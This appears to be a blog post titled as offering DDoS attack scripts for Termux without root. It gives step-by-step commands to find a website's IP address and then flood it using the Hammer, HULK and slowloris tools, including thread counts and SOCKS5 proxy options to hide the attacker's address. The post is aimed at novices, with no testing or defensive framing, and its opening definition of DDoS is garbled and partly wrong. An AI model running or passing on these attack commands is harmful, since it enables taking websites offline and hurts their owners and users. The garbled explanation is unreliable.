3 LATEST DDOS ATTACK SCRIPT FOR TERMUX NO-ROOT
What is a DDoS Attack?
A
Distributable Denied-of-Service (DDOS) attack server that cuts off
targets or surrounding infrastructure in a flood of Internet traffic
DDoS
attacks achieve effectiveness using multiple compromised computer
systems as a source of attack traffic. Search engines may include
computers and other network resources such as IoT devices. From a higher
level, the DDOS attack is like an unexpected traffic jam stuck on a
highway, preventing regular traffic from reaching its destination.
NOTE (Please, make sure you have installed python3
HOW TO FIND IP OF ANY SITE ?
to find IP of any site go to termux and type
$ ping (sitelink)
METHOD 1
$ apt update
$ apt upgrade
$ apt install python
$ apt install git
$ apt install dnsutils
$ git clone https://github.com/Pavithran-R/Hammer/
Hammer need the Name Server of a website which you want to attack...
To get the Name Server...just type
$ nslookup example.com
Note the IP Address of that Website
then
$ cd Hammer
$ python hammer.py -s [ip Address] -t 135
example:
$ python hammer.py -s 123.45.67.89 -t 135
METHOD 2
HULK DDos Attack
How to Run ?
git clone https://github.com/Mr4FX/Hulk-ddos-attack
chmod +x hulk.py
python hulk.py
you don't need experince to understand it ...
METHOD 3
MOST POWERFUL TOOL SUPPORT NO-ROOT AND ROOT
slowloris.py - Simple slowloris in Python
What is Slowloris?
Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this:
We start making lots of HTTP requests.
We send headers periodically (every ~15 seconds) to keep the connections open.
We
never close the connection unless the server does so. If the server
closes a connection, we create a new one keep doing the same thing.
This exhausts the servers thread pool and the server can't reply to other people.
Citation
If you found this work useful, please cite it as
How to install and run?
You can clone the git repo or install using pip. Here's how you run it.
sudo pip3 install slowloris
slowloris example.com
That's all it takes to install and run slowloris.py.
want to clone using git instead of pip, here's how you do it. Open termux and paste these cmds
git clone https://github.com/gkbrk/slowloris.git
cd slowloris
python3 slowloris.py example.com
SOCKS5 proxy support
However,
if you plan on using the -x option in order to use a SOCKS5 proxy for
connecting instead of a direct connection over your IP address, you will
need to install the PySocks library (or any other implementation of the
socks library) as well. PySocks is a fork from SocksiPy by GitHub user
@Anorov and can easily be installed by adding PySocks to the pip command
above or running it again like so:
sudo pip3 install PySocks
You
can then use the -x option to activate SOCKS5 support and the
--proxy-host and --proxy-port option to specify the SOCKS5 proxy host
and its port, if they are different from the standard 127.0.0.1:8080.
Configuration options
It
is possible to modify the behaviour of slowloris with command-line
arguments. In order to get an up-to-date help document, just run
slowloris -h.
-p, --port
-Port of webserver, usually 80
--s, --sockets
Number of sockets to use in the test
-v, --verbose
-Increases logging (output on terminal)
--ua, --randuseragents
Randomizes user-agents with each request
-x, --useproxy
-Use a SOCKS5 proxy for connecting
---https
Use HTTPS for the requests
--sleeptime
Time to sleep between each header sent
Post a Comment